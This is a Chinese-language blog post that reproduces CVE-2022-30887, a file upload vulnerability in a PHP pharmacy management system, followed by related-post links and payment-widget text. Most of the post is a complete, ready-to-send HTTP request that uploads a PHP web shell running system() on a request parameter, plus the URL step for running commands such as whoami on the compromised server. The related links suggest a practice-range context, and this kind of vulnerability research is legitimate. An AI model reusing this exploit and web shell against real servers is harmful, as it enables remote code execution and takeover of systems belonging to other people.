CVE-2022-30887漏洞复现

已于 2022-11-06 15:22:25 修改
阅读量2.2k 收藏 4
点赞数 2
文章标签: php 开发语言 安全 网络 服务器
于 2022-11-06 15:06:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45177807/article/details/127715959
版权

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

1. 访问ip:port

2.抓包,将抓取到的内容替换为如下poc,返回successfully即为上传成功。

POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 556
Connection: close
Cookie: PHPSESSID=t1jo541l52f76t9upiu0pbqv0c
Upgrade-Insecure-Requests: 1

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"


-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg

<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"


-----------------------------208935235035266125502673738631--

3.访问ip:port/assets/myimages/shell.php?s=whoami即可执行命令

weixin_45177807
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
PHARMACY-MANAGEMENT-SYSTEM
03-22
PHARMACY-MANAGEMENT-SYSTEM
【春秋云境】CVE-2022-30887
ZXW_NUDT的博客
02-22 2562
【春秋云境】CVE-2022-30887
【2024】Linux漏洞合集_nodejs 代码注入漏洞(cve-2024-21824)怎么修
最新发布
2301_79058150的博客
05-06 663
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞
Ambition_sec的博客
11-17 1567
春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞
春秋云境:CVE-2022-30887
一只爱吃橙子的羊
11-29 4000
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-22963 Demo
04-14
CVE-2022-22963 Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
pharmacy-management-system:具有完整功能的药房管理系统
03-11
药房管理系统 具有完整功能的药房管理系统Dmoe网址: ://trustonepharmacy.somrat.info/
春秋云境:CVE-2022-30887(文件上传漏洞
m0_65712192的博客
04-14 2344
该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
CVE-2022-30887 春秋云镜
biejianghua的博客
11-28 640
CVE-2022-30887
春秋云境靶场CVE-2022-30887漏洞(任意文件上传漏洞)
zyh1588的博客
11-21 852
小白CVE-2022-30887漏洞
CVE-2022-30887春秋运镜漏洞
m0_51674437的博客
07-03 293
CVE-2022-30887漏洞
文件上传漏洞CVE-2022-30887)
热门推荐
Battery的博客
09-11 9万+
多语言药房管理系统(MPMS)是用PHP和MySQL开发的,该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。该CMS中php_action/editProductImage.php存在任意文件上传漏洞,攻击者可利用此漏洞,将恶意代码上传至服务器并执行,从而控制服务器。
春秋云镜 CVE-2022-30887 多语言药房管理系统 (MPMS) [超详细新手教程]
starttv的博客
10-26 4549
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
【春秋云镜 CVE-2022-30887wp】
风依旧的博客
10-18 3456
春秋云镜 CVE-2022-30887 WP
cve-2022-41741漏洞
08-24
根据引用的信息,CVE-2022-41741漏洞是在ngx_http_mp4_module中存在的一个内存损坏和内存泄漏的问题。该漏洞已经在nginx-1.23.2主线版中得到修。因此,要CVE-2022-41741漏洞,首先需要使用受影响的版本(例如nginx-1.23.1及之前的版本),然后使用ngx_http_mp4_module模块进行相关操作,即可漏洞。请注意,为了保障系统的安全性,我们强烈建议及时更新至最新版本的NGINX,并避免使用已知存在漏洞的旧版本。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [立即升级 NGINX 以应对漏洞风险](https://blog.csdn.net/m0_58461993/article/details/127432416)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [远程执行代码漏洞(CVE-2018-0886)漏洞](https://download.csdn.net/download/liuxs1230/88237267)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值